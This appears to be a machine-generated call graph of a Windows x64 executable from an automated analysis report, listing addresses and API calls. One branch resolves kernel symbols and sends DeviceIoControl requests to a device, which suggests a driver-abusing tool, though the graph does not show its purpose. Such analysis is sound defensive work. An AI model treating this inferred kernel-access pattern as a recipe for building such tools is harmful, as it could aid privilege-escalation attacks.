7ff7cc41d09c 7682->7683 7684 7ff7cc41d0f5 7682->7684 7683->7684 7685 7ff7cc41d0a1 memmove 7683->7685 7686 7ff7cc41d158 7684->7686 7687 7ff7cc41d0fd memmove 7684->7687 7692 7ff7cc41d23f 7685->7692 7688 7ff7cc41d257 7686->7688 7689 7ff7cc41d171 7686->7689 7690 7ff7cc41d13e 7687->7690 7691 7ff7cc41d141 memmove 7687->7691 7708 7ff7cc411230 ?_Xlength_error@std@@YAXPEBD 7688->7708 7695 7ff7cc41d25c 7689->7695 7696 7ff7cc41d1ee 7689->7696 7697 7ff7cc41d1cc 7689->7697 7690->7691 7691->7692 7698 7ff7cc411190 Concurrency::cancel_current_task __std_exception_copy 7695->7698 7701 7ff7cc41d1d9 memmove 7696->7701 7704 7ff7cc424108 std::_Facet_Register 3 API calls 7696->7704 7699 7ff7cc424108 std::_Facet_Register 3 API calls 7697->7699 7700 7ff7cc41d262 7698->7700 7703 7ff7cc41d1d4 7699->7703 7705 7ff7cc41d228 7701->7705 7706 7ff7cc41d22b memmove 7701->7706 7703->7701 7707 7ff7cc41d1e7 _invalid_parameter_noinfo_noreturn 7703->7707 7704->7701 7705->7706 7706->7692 7707->7696 7709 7ff7cc419c50 7710 7ff7cc419c73 7709->7710 7711 7ff7cc419cae ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 7710->7711 7712 7ff7cc419ef0 12 API calls 7710->7712 7713 7ff7cc419ccb 7711->7713 7714 7ff7cc419cbe 7711->7714 7712->7711 7715 7ff7cc423fe0 free 7714->7715 7715->7713 7790 7ff7cc418ad0 7791 7ff7cc418b0e 7790->7791 7792 7ff7cc418ae1 7790->7792 7793 7ff7cc418b06 7792->7793 7795 7ff7cc418b21 _invalid_parameter_noinfo_noreturn 7792->7795 7794 7ff7cc423fe0 free 7793->7794 7794->7791 7796 7ff7cc41c7a0 18 API calls 7795->7796 7797 7ff7cc418b45 ?always_noconv@codecvt_base@std@ 7796->7797 7798 7ff7cc418b68 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 7797->7798 7799 7ff7cc418b55 7797->7799 7422 7ff7cc424654 7423 7ff7cc424664 7422->7423 7435 7ff7cc4241bc 7423->7435 7425 7ff7cc4246eb 7426 7ff7cc424b58 9 API calls 7425->7426 7434 7ff7cc4246f9 7425->7434 7427 7ff7cc424709 7426->7427 7428 7ff7cc424688 _RTC_Initialize 7428->7425 7443 7ff7cc424e20 InitializeSListHead 7428->7443 7430 7ff7cc4246b2 7431 7ff7cc4246d6 _configthreadlocale 7430->7431 7432 7ff7cc4246e2 7431->7432 7432->7425 7433 7ff7cc4246e6 _initialize_wide_environment 7432->7433 7433->7425 7436 7ff7cc4241cd 7435->7436 7437 7ff7cc4241ff 7435->7437 7438 7ff7cc42423c 7436->7438 7441 7ff7cc4241d2 __scrt_acquire_startup_lock 7436->7441 7437->7428 7439 7ff7cc424b58 9 API calls 7438->7439 7440 7ff7cc424246 7439->7440 7441->7437 7442 7ff7cc4241ef _initialize_onexit_table 7441->7442 7442->7437 7716 7ff7cc425256 7717 7ff7cc425269 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 7716->7717 7718 7ff7cc425281 7716->7718 7717->7718 4970 7ff7cc424738 4971 7ff7cc424751 4970->4971 4972 7ff7cc424759 __scrt_acquire_startup_lock 4971->4972 4973 7ff7cc42488f 4971->4973 4975 7ff7cc424899 4972->4975 4980 7ff7cc424777 __scrt_release_startup_lock 4972->4980 5116 7ff7cc424b58 IsProcessorFeaturePresent 4973->5116 4976 7ff7cc424b58 9 API calls 4975->4976 4977 7ff7cc4248a4 4976->4977 4979 7ff7cc4248ac _exit 4977->4979 4978 7ff7cc42479c 4980->4978 4981 7ff7cc424822 _get_initial_wide_environment __p___wargv __p___argc 4980->4981 4985 7ff7cc42481a _register_thread_local_exe_atexit_callback 4980->4985 4990 7ff7cc421630 SetUnhandledExceptionFilter 4981->4990 4985->4981 4987 7ff7cc42484f 4988 7ff7cc424859 4987->4988 4989 7ff7cc424854 _cexit 4987->4989 4988->4978 4989->4988 4991 7ff7cc42173c 4990->4991 4993 7ff7cc421694 4990->4993 5335 7ff7cc421390 4991->5335 4993->4991 4994 7ff7cc4216c0 _wcsicmp 4993->4994 4996 7ff7cc421b2a 4993->4996 4999 7ff7cc421700 _wcsicmp 4993->4999 4994->4993 4995 7ff7cc421974 5000 7ff7cc4219aa 4995->5000 5340 7ff7cc41a3c0 4995->5340 4998 7ff7cc421390 2 API calls 4996->4998 4997 7ff7cc421790 _wcsicmp 5002 7ff7cc421754 4997->5002 4998->5002 4999->4993 5004 7ff7cc4219d2 5000->5004 5005 7ff7cc41a3c0 9 API calls 5000->5005 5001 7ff7cc421840 _wcsicmp 5007 7ff7cc421808 5001->5007 5002->4997 5002->5007 5014 7ff7cc4217d0 _wcsicmp 5002->5014 5008 7ff7cc4219f9 5004->5008 5012 7ff7cc41a3c0 9 API calls 5004->5012 5010 7ff7cc4219c2 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5005->5010 5006 7ff7cc421900 _wcsicmp 5011 7ff7cc4218b9 5006->5011 5007->5001 5007->5011 5016 7ff7cc421880 _wcsicmp 5007->5016 5013 7ff7cc421a21 5008->5013 5017 7ff7cc41a3c0 9 API calls 5008->5017 5010->5004 5011->4995 5011->5006 5018 7ff7cc421940 _wcsicmp 5011->5018 5015 7ff7cc4219e9 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5012->5015 5020 7ff7cc41a3c0 9 API calls 5013->5020 5034 7ff7cc421a48 5013->5034 5014->5002 5015->5008 5016->5007 5019 7ff7cc421a11 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5017->5019 5018->5011 5019->5013 5023 7ff7cc421a38 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5020->5023 5021 7ff7cc421d3b 5022 7ff7cc41a3c0 9 API calls 5021->5022 5024 7ff7cc421d4e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5022->5024 5023->5034 5025 7ff7cc41a3c0 9 API calls 5024->5025 5026 7ff7cc421d71 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5025->5026 5027 7ff7cc421d81 5026->5027 5354 7ff7cc423fc0 5027->5354 5030 7ff7cc41c8b0 7 API calls 5030->5034 5034->5021 5034->5030 5035 7ff7cc421db3 _invalid_parameter_noinfo_noreturn 5034->5035 5036 7ff7cc421dba _invalid_parameter_noinfo_noreturn 5034->5036 5037 7ff7cc421dc8 5034->5037 5038 7ff7cc421dc1 _invalid_parameter_noinfo_noreturn 5034->5038 5039 7ff7cc423fe0 free 5034->5039 5122 7ff7cc423948 ___lc_codepage_func 5034->5122 5125 7ff7cc4222d0 5034->5125 5035->5036 5036->5038 5037->5021 5040 7ff7cc421dd5 5037->5040 5038->5037 5039->5034 5143 7ff7cc41c8b0 5040->5143 5042 7ff7cc421e07 5043 7ff7cc41c8b0 7 API calls 5042->5043 5044 7ff7cc421e36 5043->5044 5160 7ff7cc423b60 5044->5160 5046 7ff7cc42221e 5546 7ff7cc421280 5046->5546 5048 7ff7cc421f30 5050 7ff7cc421f8a 5048->5050 5051 7ff7cc421f34 5048->5051 5198 7ff7cc4145e0 LoadLibraryA LoadLibraryA _dupenv_s 5050->5198 5055 7ff7cc41a3c0 9 API calls 5051->5055 5052 7ff7cc421f2b 5363 7ff7cc423fe0 5052->5363 5053 7ff7cc421e5d 5053->5046 5053->5048 5053->5052 5057 7ff7cc421f17 _invalid_parameter_noinfo_noreturn 5053->5057 5058 7ff7cc421f47 5055->5058 5057->5053 5366 7ff7cc41d590 5058->5366 5060 7ff7cc421fab 5380 7ff7cc424108 5060->5380 5061 7ff7cc421fa1 5325 7ff7cc421590 GetShellWindow GetWindowThreadProcessId 5061->5325 5067 7ff7cc41a3c0 9 API calls 5069 7ff7cc421f70 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5067->5069 5071 7ff7cc421590 28 API calls 5069->5071 5072 7ff7cc421f85 5071->5072 5072->5027 5073 7ff7cc422131 5072->5073 5076 7ff7cc42220b _invalid_parameter_noinfo_noreturn 5072->5076 5077 7ff7cc423fe0 free 5073->5077 5082 7ff7cc422212 5076->5082 5077->5027 5086 7ff7cc423fe0 free 5082->5086 5086->5027 5114 7ff7cc424cac GetModuleHandleW 5115 7ff7cc42484b 5114->5115 5115->4977 5115->4987 5117 7ff7cc424b7e 5116->5117 5118 7ff7cc424b8c memset RtlCaptureContext RtlLookupFunctionEntry 5117->5118 5119 7ff7cc424c02 memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5118->5119 5120 7ff7cc424bc6 RtlVirtualUnwind 5118->5120 5121 7ff7cc424c82 5119->5121 5120->5119 5121->4975 5123 7ff7cc423968 5122->5123 5124 7ff7cc42395b AreFileApisANSI 5122->5124 5123->5034 5124->5123 5126 7ff7cc421be9 memcmp 5125->5126 5127 7ff7cc422320 5125->5127 5126->5034 5142 7ff7cc422411 5127->5142 5563 7ff7cc423970 5127->5563 5131 7ff7cc422417 5132 7ff7cc420880 12 API calls 5131->5132 5133 7ff7cc422423 5132->5133 5134 7ff7cc42238c memset 5138 7ff7cc422360 5134->5138 5135 7ff7cc4223b3 5573 7ff7cc422770 5135->5573 5139 7ff7cc423970 __std_fs_convert_wide_to_narrow 5 API calls 5138->5139 5140 7ff7cc4223e0 5139->5140 5140->5126 5593 7ff7cc420880 5140->5593 5597 7ff7cc4205b0 5142->5597 5144 7ff7cc41c9d7 5143->5144 5145 7ff7cc41c8d6 5143->5145 5614 7ff7cc411230 ?_Xlength_error@std@@YAXPEBD 5144->5614 5146 7ff7cc41c8e9 memmove 5145->5146 5149 7ff7cc41c90f 5145->5149 5146->5042 5148 7ff7cc41c9dc 5151 7ff7cc411190 Concurrency::cancel_current_task __std_exception_copy 5148->5151 5149->5148 5150 7ff7cc41c990 5149->5150 5152 7ff7cc41c96e 5149->5152 5153 7ff7cc41c97b memmove 5150->5153 5156 7ff7cc424108 std::_Facet_Register 3 API calls 5150->5156 5154 7ff7cc41c9e2 5151->5154 5155 7ff7cc424108 std::_Facet_Register 3 API calls 5152->5155 5153->5042 5158 7ff7cc41c976 5155->5158 5156->5153 5158->5153 5159 7ff7cc41c989 _invalid_parameter_noinfo_noreturn 5158->5159 5159->5150 5163 7ff7cc423ba2 5160->5163 5161 7ff7cc423bab 5162 7ff7cc423fc0 8 API calls 5161->5162 5165 7ff7cc423e4d 5162->5165 5163->5161 5164 7ff7cc423cbd 5163->5164 5167 7ff7cc423c03 GetFileAttributesExW 5163->5167 5615 7ff7cc423e88 CreateFileW 5164->5615 5165->5053 5169 7ff7cc423c68 5167->5169 5170 7ff7cc423c17 GetLastError 5167->5170 5169->5161 5169->5164 5170->5161 5173 7ff7cc423c26 FindFirstFileW 5170->5173 5171 7ff7cc423d06 5176 7ff7cc423d15 GetFileInformationByHandleEx 5171->5176 5194 7ff7cc423db7 5171->5194 5172 7ff7cc423ce6 5174 7ff7cc423cff 5172->5174 5175 7ff7cc423cf1 CloseHandle 5172->5175 5177 7ff7cc423c3a GetLastError 5173->5177 5178 7ff7cc423c45 FindClose 5173->5178 5174->5161 5175->5174 5179 7ff7cc423e78 abort 5175->5179 5182 7ff7cc423d58 5176->5182 5183 7ff7cc423d2f GetLastError 5176->5183 5177->5161 5178->5169 5179->5174 5180 7ff7cc423dd2 GetFileInformationByHandleEx 5181 7ff7cc423e12 5180->5181 5184 7ff7cc423de8 GetLastError 5180->5184 5186 7ff7cc423e29 5181->5186 5187 7ff7cc423e65 5181->5187 5192 7ff7cc423d79 GetFileInformationByHandleEx 5182->5192 5182->5194 5183->5174 5185 7ff7cc423d3d CloseHandle 5183->5185 5184->5174 5189 7ff7cc423dfa CloseHandle 5184->5189 5185->5174 5190 7ff7cc423d4a abort 5185->5190 5186->5161 5191 7ff7cc423e2f CloseHandle 5186->5191 5187->5174 5188 7ff7cc423e6b CloseHandle 5187->5188 5188->5174 5188->5179 5189->5174 5195 7ff7cc423e0b abort 5189->5195 5190->5174 5191->5161 5191->5179 5193 7ff7cc423d95 GetLastError 5192->5193 5192->5194 5193->5174 5196 7ff7cc423da3 CloseHandle 5193->5196 5194->5180 5194->5181 5195->5181 5196->5174 5197 7ff7cc423db0 abort 5196->5197 5197->5194 5199 7ff7cc414670 5198->5199 5199->5199 5618 7ff7cc41c9f0 5199->5618 5201 7ff7cc414683 5635 7ff7cc41a0f0 5201->5635 5203 7ff7cc41469b 5204 7ff7cc4146f9 free 5203->5204 5206 7ff7cc4146f4 5203->5206 5208 7ff7cc4146ed _invalid_parameter_noinfo_noreturn 5203->5208 5205 7ff7cc41c9f0 7 API calls 5204->5205 5207 7ff7cc414762 5205->5207 5209 7ff7cc423fe0 free 5206->5209 5641 7ff7cc419af0 5207->5641 5208->5206 5209->5204 5211 7ff7cc414770 5662 7ff7cc413ce0 5211->5662 5214 7ff7cc41c9f0 7 API calls 5216 7ff7cc4147c5 SymFromName 5214->5216 5215 7ff7cc41a3c0 9 API calls 5217 7ff7cc4148bd ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5215->5217 5218 7ff7cc414828 5216->5218 5219 7ff7cc41485e 5216->5219 5221 7ff7cc414ec1 5217->5221 5226 7ff7cc414857 5218->5226 5227 7ff7cc414899 _invalid_parameter_noinfo_noreturn 5218->5227 5234 7ff7cc414790 5218->5234 5220 7ff7cc4148a5 5219->5220 5224 7ff7cc4148a0 5219->5224 5219->5227 5225 7ff7cc4148d2 _time64 GetCurrentThreadId srand rand 5220->5225 5220->5234 5222 7ff7cc414ed8 SymUnloadModule64 SymCleanup CloseHandle CloseHandle 5221->5222 5223 7ff7cc414f05 5221->5223 5222->5223 5229 7ff7cc414f3c 5223->5229 5238 7ff7cc414f7e _invalid_parameter_noinfo_noreturn 5223->5238 5239 7ff7cc423fe0 free 5223->5239 5230 7ff7cc423fe0 free 5224->5230 5231 7ff7cc41499a 5225->5231 5232 7ff7cc414953 5225->5232 5228 7ff7cc423fe0 free 5226->5228 5227->5224 5228->5234 5236 7ff7cc414f8a 5229->5236 5229->5238 5240 7ff7cc414f85 5229->5240 5230->5220 5235 7ff7cc41a3c0 9 API calls 5231->5235 5233 7ff7cc414967 rand 5232->5233 5233->5231 5233->5233 5234->5215 5247 7ff7cc4149b0 5235->5247 5237 7ff7cc414fd9 5236->5237 5241 7ff7cc414fd4 5236->5241 5244 7ff7cc414fcd _invalid_parameter_noinfo_noreturn 5236->5244 5242 7ff7cc423fc0 8 API calls 5237->5242 5238->5240 5239->5229 5243 7ff7cc423fe0 free 5240->5243 5245 7ff7cc423fe0 free 5241->5245 5246 7ff7cc414feb 5242->5246 5243->5236 5244->5241 5245->5237 5246->5060 5246->5061 5248 7ff7cc41d590 9 API calls 5247->5248 5249 7ff7cc4149d7 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5248->5249 5250 7ff7cc414a2d 5249->5250 5251 7ff7cc4149f3 5249->5251 5255 7ff7cc414a3e 5250->5255 5256 7ff7cc414a66 _wremove memset 5250->5256 5252 7ff7cc414a28 5251->5252 5253 7ff7cc414a21 _invalid_parameter_noinfo_noreturn 5251->5253 5254 7ff7cc423fe0 free 5252->5254 5253->5252 5254->5250 5258 7ff7cc41a3c0 9 API calls 5255->5258 5680 7ff7cc4189c0 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5256->5680 5260 7ff7cc414a51 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5258->5260 5264 7ff7cc414e7e 5260->5264 5261 7ff7cc414ade 5685 7ff7cc419ef0 5261->5685 5262 7ff7cc414b23 5263 7ff7cc419ef0 12 API calls 5262->5263 5266 7ff7cc414b28 5263->5266 5264->5221 5270 7ff7cc414ebc 5264->5270 5275 7ff7cc414eb5 _invalid_parameter_noinfo_noreturn 5264->5275 5268 7ff7cc414b2d ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 5266->5268 5269 7ff7cc414b50 5266->5269 5267 7ff7cc414ae3 5271 7ff7cc414ae8 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 5267->5271 5272 7ff7cc414b0b 5267->5272 5268->5269 5274 7ff7cc414000 15 API calls 5269->5274 5273 7ff7cc423fe0 free 5270->5273 5271->5272 5691 7ff7cc414000 5272->5691 5273->5221 5277 7ff7cc414b5c 5274->5277 5275->5270 5695 7ff7cc422900 5277->5695 5280 7ff7cc414b69 5282 7ff7cc41a3c0 9 API calls 5280->5282 5281 7ff7cc414ba5 CreateFileW 5283 7ff7cc414beb 5281->5283 5293 7ff7cc414bdf 5281->5293 5285 7ff7cc414b7c ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z _wremove 5282->5285 5284 7ff7cc41c9f0 7 API calls 5283->5284 5286 7ff7cc414c13 5284->5286 5285->5264 5744 7ff7cc4232c0 NtQuerySystemInformation 5286->5744 5287 7ff7cc41a3c0 9 API calls 5289 7ff7cc414e65 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5287->5289 5309 7ff7cc414d0b 5289->5309 5291 7ff7cc415a80 94 API calls 5313 7ff7cc414e4d 5291->5313 5292 7ff7cc414c60 5295 7ff7cc423fe0 free 5292->5295 5293->5287 5294 7ff7cc414c59 _invalid_parameter_noinfo_noreturn 5294->5292 5297 7ff7cc414c65 5295->5297 5296 7ff7cc41c9f0 7 API calls 5298 7ff7cc414ca5 5296->5298 5297->5293 5297->5296 5299 7ff7cc4232c0 25 API calls 5298->5299 5300 7ff7cc414cb0 5299->5300 5301 7ff7cc414cf3 5300->5301 5302 7ff7cc414cee 5300->5302 5305 7ff7cc414ce7 _invalid_parameter_noinfo_noreturn 5300->5305 5303 7ff7cc414cf8 5301->5303 5304 7ff7cc414d10 5301->5304 5306 7ff7cc423fe0 free 5302->5306 5764 7ff7cc41a7c0 5303->5764 5782 7ff7cc417b00 5304->5782 5305->5302 5306->5301 5309->5291 5310 7ff7cc414d60 DeviceIoControl 5310->5293 5311 7ff7cc414d34 5310->5311 5311->5293 5311->5310 5312 7ff7cc414dd8 5311->5312 5312->5313 5798 7ff7cc4172b0 5312->5798 5313->5264 5320 7ff7cc414e2f 6026 7ff7cc415010 5320->6026 5323 7ff7cc41a7c0 29 API calls 5324 7ff7cc414e4b 5323->5324 5324->5289 6455 7ff7cc4214c0 GetCurrentProcessId CreateToolhelp32Snapshot 5325->6455 5328 7ff7cc42161d 5330 7ff7cc423fc0 8 API calls 5328->5330 5329 7ff7cc41a3c0 9 API calls 5331 7ff7cc4215dd ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5329->5331 5332 7ff7cc42162a 5330->5332 5333 7ff7cc41a3c0 9 API calls 5331->5333 5332->5072 5334 7ff7cc421600 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z ?get@?$basic_istream@DU?$char_traits@D@std@@@std@ 5333->5334 5334->5328 5337 7ff7cc4213b0 5335->5337 5336 7ff7cc421466 5336->5002 5337->5336 5338 7ff7cc4213ff _wcsicmp 5337->5338 5339 7ff7cc421436 _wcsicmp 5337->5339 5338->5337 5339->5337 5343 7ff7cc41a3f0 ?good@ios_base@std@ 5340->5343 5342 7ff7cc41a444 5345 7ff7cc41a45a ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 5342->5345 5350 7ff7cc41a472 5342->5350 5343->5342 5343->5350 5344 7ff7cc41a47c ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 5348 7ff7cc41a55e ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 5344->5348 5352 7ff7cc41a568 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5344->5352 5345->5350 5347 7ff7cc41a4cf ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 5347->5344 5351 7ff7cc41a4ec 5347->5351 5348->5352 5349 7ff7cc41a4a6 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W 5349->5344 5349->5350 5350->5344 5350->5347 5350->5349 5351->5344 5353 7ff7cc41a4f5 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W 5351->5353 5352->5000 5353->5344 5353->5351 5355 7ff7cc423fc9 5354->5355 5356 7ff7cc421d92 5355->5356 5357 7ff7cc4243ec IsProcessorFeaturePresent 5355->5357 5356->5114 5358 7ff7cc424404 5357->5358 6464 7ff7cc4245e0 RtlCaptureContext 5358->6464 5363->5048 5364 7ff7cc424af4 free 5363->5364 5367 7ff7cc41d5cc ?good@ios_base@std@ 5366->5367 5369 7ff7cc41d605 5367->5369 5377 7ff7cc41d633 5367->5377 5370 7ff7cc41d61b ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 5369->5370 5369->5377 5370->5377 5372 7ff7cc41d694 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 5375 7ff7cc41d63d ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 5372->5375 5376 7ff7cc41d684 5372->5376 5373 7ff7cc41d71f ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 5379 7ff7cc41d729 5373->5379 5374 7ff7cc41d667 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W 5374->5376 5374->5377 5375->5373 5375->5379 5376->5375 5378 7ff7cc41d6b6 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W 5376->5378 5377->5372 5377->5374 5377->5375 5378->5375 5378->5376 5379->5067 5381 7ff7cc424122 malloc 5380->5381 5382 7ff7cc421fc7 5381->5382 5383 7ff7cc424113 5381->5383 5389 7ff7cc423080 memset 5382->5389 5383->5381 5384 7ff7cc424132 5383->5384 5385 7ff7cc42413d 5384->5385 6469 7ff7cc424b1c 5384->6469 5387 7ff7cc411190 Concurrency::cancel_current_task __std_exception_copy 5385->5387 5388 7ff7cc424143 5387->5388 5390 7ff7cc4230cd 5389->5390 5391 7ff7cc4230d0 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 5389->5391 5390->5391 5392 7ff7cc419fb0 24 API calls 5391->5392 5393 7ff7cc42317e 5392->5393 5394 7ff7cc4231a2 ??7ios_base@std@ 5393->5394 5395 7ff7cc423183 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 5393->5395 5396 7ff7cc4231de 5394->5396 5397 7ff7cc4231e5 5394->5397 5395->5394 6486 7ff7cc411e20 5396->6486 6473 7ff7cc4234f0 5397->6473 5402 7ff7cc419ef0 12 API calls 5404 7ff7cc42325d 5402->5404 5404->5396 5406 7ff7cc423262 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 5404->5406 5406->5396 7153 7ff7cc419ab0 5546->7153 5551 7ff7cc4212ee 5552 7ff7cc421346 5551->5552 5554 7ff7cc4212f4 5551->5554 5553 7ff7cc41a3c0 9 API calls 5552->5553 5555 7ff7cc421359 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5553->5555 5556 7ff7cc41a3c0 9 API calls 5554->5556 5557 7ff7cc42137a 5555->5557 5558 7ff7cc421375 5555->5558 5559 7ff7cc421307 ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX 5556->5559 5560 7ff7cc415a80 94 API calls 5558->5560 5561 7ff7cc41a3c0 9 API calls 5559->5561 5560->5557 5562 7ff7cc421326 ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@K 5561->5562 5562->5555 5564 7ff7cc423997 5563->5564 5565 7ff7cc4239ee WideCharToMultiByte 5563->5565 5564->5565 5566 7ff7cc42399f WideCharToMultiByte 5564->5566 5567 7ff7cc423a1f 5565->5567 5566->5567 5570 7ff7cc422345 5566->5570 5568 7ff7cc423a2b 5567->5568 5569 7ff7cc423a23 GetLastError 5567->5569 5568->5570 5571 7ff7cc423a38 WideCharToMultiByte 5568->5571 5569->5568 5570->5131 5570->5134 5570->5135 5570->5138 5571->5570 5572 7ff7cc423a65 GetLastError 5571->5572 5572->5570 5574 7ff7cc4228ea 5573->5574 5577 7ff7cc42279d 5573->5577 5601 7ff7cc411230 ?_Xlength_error@std@@YAXPEBD 5574->5601 5576 7ff7cc4227fd 5579 7ff7cc424108 std::_Facet_Register 3 API calls 5576->5579 5577->5576 5580 7ff7cc422829 5577->5580 5581 7ff7cc4227f0 5577->5581 5578 7ff7cc4228ef 5602 7ff7cc411190 5578->5602 5582 7ff7cc422812 5579->5582 5580->5582 5585 7ff7cc424108 std::_Facet_Register 3 API calls 5580->5585 5581->5576 5581->5578 5584 7ff7cc4228a5 _invalid_parameter_noinfo_noreturn 5582->5584 5587 7ff7cc4228ac memmove memset 5582->5587 5588 7ff7cc422859 memmove memset 5582->5588 5584->5587 5585->5582 5586 7ff7cc4228f5 5589 7ff7cc4228a3 5587->5589 5590 7ff7cc422898 5588->5590 5591 7ff7cc422883 5588->5591 5589->5138 5592 7ff7cc423fe0 free 5590->5592 5591->5584 5591->5590 5592->5589 5594 7ff7cc420890 5593->5594 5605 7ff7cc4204c0 5594->5605 5598 7ff7cc4205be 5597->5598 5599 7ff7cc4204c0 11 API calls 5598->5599 5600 7ff7cc4205d5 _CxxThrowException __std_exception_copy 5599->5600 5600->5131 5603 7ff7cc41119e Concurrency::cancel_current_task 5602->5603 5604 7ff7cc4111af __std_exception_copy 5603->5604 5604->5586 5606 7ff7cc4204f6 __std_exception_copy 5605->5606 5607 7ff7cc42057a 5606->5607 5608 7ff7cc420545 5606->5608 5610 7ff7cc423fc0 8 API calls 5607->5610 5609 7ff7cc420575 5608->5609 5611 7ff7cc42056e _invalid_parameter_noinfo_noreturn 5608->5611 5612 7ff7cc423fe0 free 5609->5612 5613 7ff7cc42059b _CxxThrowException 5610->5613 5611->5609 5612->5607 5616 7ff7cc423eca GetLastError 5615->5616 5617 7ff7cc423ce0 5615->5617 5616->5617 5617->5171 5617->5172 5619 7ff7cc41cae1 5618->5619 5620 7ff7cc41ca16 5618->5620 6116 7ff7cc411230 ?_Xlength_error@std@@YAXPEBD 5619->6116 5621 7ff7cc41ca3c 5620->5621 5622 7ff7cc41ca24 memmove 5620->5622 5624 7ff7cc41cae6 5621->5624 5625 7ff7cc41caa4 5621->5625 5626 7ff7cc41ca4d 5621->5626 5622->5201 5628 7ff7cc411190 Concurrency::cancel_current_task __std_exception_copy 5624->5628 5629 7ff7cc41ca68 memmove 5625->5629 5632 7ff7cc424108 std::_Facet_Register 3 API calls 5625->5632 5627 7ff7cc424108 std::_Facet_Register 3 API calls 5626->5627 5630 7ff7cc41ca63 5627->5630 5631 7ff7cc41caec 5628->5631 5629->5201 5630->5629 5634 7ff7cc41ca9d _invalid_parameter_noinfo_noreturn 5630->5634 5632->5629 5634->5625 5636 7ff7cc41a152 5635->5636 5637 7ff7cc41a113 memmove 5635->5637 6117 7ff7cc41cea0 5636->6117 5637->5203 5640 7ff7cc41a165 5640->5203 5642 7ff7cc419b1e 5641->5642 5643 7ff7cc419bf9 5642->5643 5646 7ff7cc419b34 5642->5646 6138 7ff7cc411230 ?_Xlength_error@std@@YAXPEBD 5643->6138 5645 7ff7cc419b42 5645->5211 5646->5645 5647 7ff7cc419bc4 5646->5647 5648 7ff7cc419bfe 5646->5648 5649 7ff7cc419b6a 5646->5649 5650 7ff7cc419bce memmove 5647->5650 5653 7ff7cc424108 std::_Facet_Register 3 API calls 5647->5653 5651 7ff7cc411190 Concurrency::cancel_current_task __std_exception_copy 5648->5651 5652 7ff7cc424108 std::_Facet_Register 3 API calls 5649->5652 5650->5211 5654 7ff7cc419c04 5651->5654 5655 7ff7cc419b80 5652->5655 5653->5650 5656 7ff7cc414000 15 API calls 5654->5656 5657 7ff7cc419b88 5655->5657 5658 7ff7cc419bbd _invalid_parameter_noinfo_noreturn 5655->5658 5659 7ff7cc419c2b 